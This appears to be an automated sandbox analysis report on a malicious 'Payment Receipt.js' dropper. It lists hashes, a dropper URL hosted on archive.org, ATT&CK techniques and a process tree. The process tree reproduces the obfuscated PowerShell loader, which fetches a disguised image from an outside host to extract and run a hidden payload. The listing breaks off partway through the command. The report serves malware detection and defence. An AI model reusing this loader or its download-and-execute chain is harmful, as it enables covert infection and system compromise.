f4e2003ac6fe30a9b388badeed14ec8b9564446738c7c2313e39e476b7a4023a

General

Target

Payment Receipt.js
Size

330KB
MD5

95be6aa690cfa33cf39ae04df1f71d10
SHA1

c6d9a946176a7b216341387b4acfa01cba1da264
SHA256

f4e2003ac6fe30a9b388badeed14ec8b9564446738c7c2313e39e476b7a4023a
SHA512

8327287a6c0833d4ef5eb1b3f77c4a89a92d8b642353987af9c8c10d9f8a607d24faf2865578d6f8ceaf6f12a2d8e6571d372e41ac839487f9b6381207800e28
SSDEEP

6144:9CgH7TPnDL0svfrbvfTDEkvPrLvPTzWmP/rbP/TDkEPvrLPvTzyCvfrbvfTDEkvT:T

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2312	powershell.exe
6	2312	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2080	powershell.exe
2312	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2080	powershell.exe
2312	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1940 wrote to memory of 2080	1940	wscript.exe	30
PID 1940 wrote to memory of 2080	1940	wscript.exe	30
PID 1940 wrote to memory of 2080	1940	wscript.exe	30
PID 2080 wrote to memory of 2312	2080	powershell.exe	32
PID 2080 wrote to memory of 2312	2080	powershell.exe	32
PID 2080 wrote to memory of 2312	2080	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Payment Receipt.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿VQBy⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿JwBo⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bw⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿Og⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿aQBh⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿dQBz⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿YQBy⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿HY⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿cgBn⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿MQ⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿aQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBz⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bo⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿bwB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿Xw⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Nw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBh⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿Bu⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿agBw⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿dwBl⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿QwBs⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿ZQBu⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿TgBl⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿LQBP⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿agBl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿TgBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBX⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿YgBD⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿aQBl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿ZQBi⟑ ㏏ ䷆ ⋀ ▿EM⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgB0⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿R⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿bgBs⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿EQ⟑ ㏏ ䷆ ⋀ ▿YQB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿K⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBV⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿EU⟑ ㏏ ䷆ ⋀ ▿bgBj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZwBd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBV⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿Rg⟑ ㏏ ䷆ ⋀ ▿4⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿RwBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿UwB0⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿aQBu⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿K⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBC⟑ ㏏ ䷆ ⋀ ▿Hk⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿KQ⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿8⟑ ㏏ ䷆ ⋀ ▿Dw⟑ ㏏ ䷆ ⋀ ▿QgBB⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿RQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿XwBT⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿QQBS⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿Pg⟑ ㏏ ䷆ ⋀ ▿+⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿8⟑ ㏏ ䷆ ⋀ ▿Dw⟑ ㏏ ䷆ ⋀ ▿QgBB⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿RQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿XwBF⟑ ㏏ ䷆ ⋀ ▿E4⟑ ㏏ ䷆ ⋀ ▿R⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿+⟑ ㏏ ䷆ ⋀ ▿D4⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bQBh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQBU⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿B0⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿E8⟑ ㏏ ䷆ ⋀ ▿Zg⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿KQ⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿ZQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿TwBm⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BG⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿YQBn⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cs⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿EY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿Gc⟑ ㏏ ䷆ ⋀ ▿LgBM⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿7⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿YgBh⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿T⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZwB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿BJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿Hg⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿YQBy⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BD⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿aQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZwBl⟑ ㏏ ䷆ ⋀ ▿FQ⟑ ㏏ ䷆ ⋀ ▿ZQB4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿LgBT⟑ ㏏ ䷆ ⋀ ▿HU⟑ ㏏ ䷆ ⋀ ▿YgBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿cgBp⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿Zw⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgB0⟑ ㏏ ䷆ ⋀ ▿Ek⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BM⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿a⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿QwBv⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿dgBl⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBG⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿bwBt⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿YQBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿Ng⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿By⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bgBn⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bi⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿DY⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿BD⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ 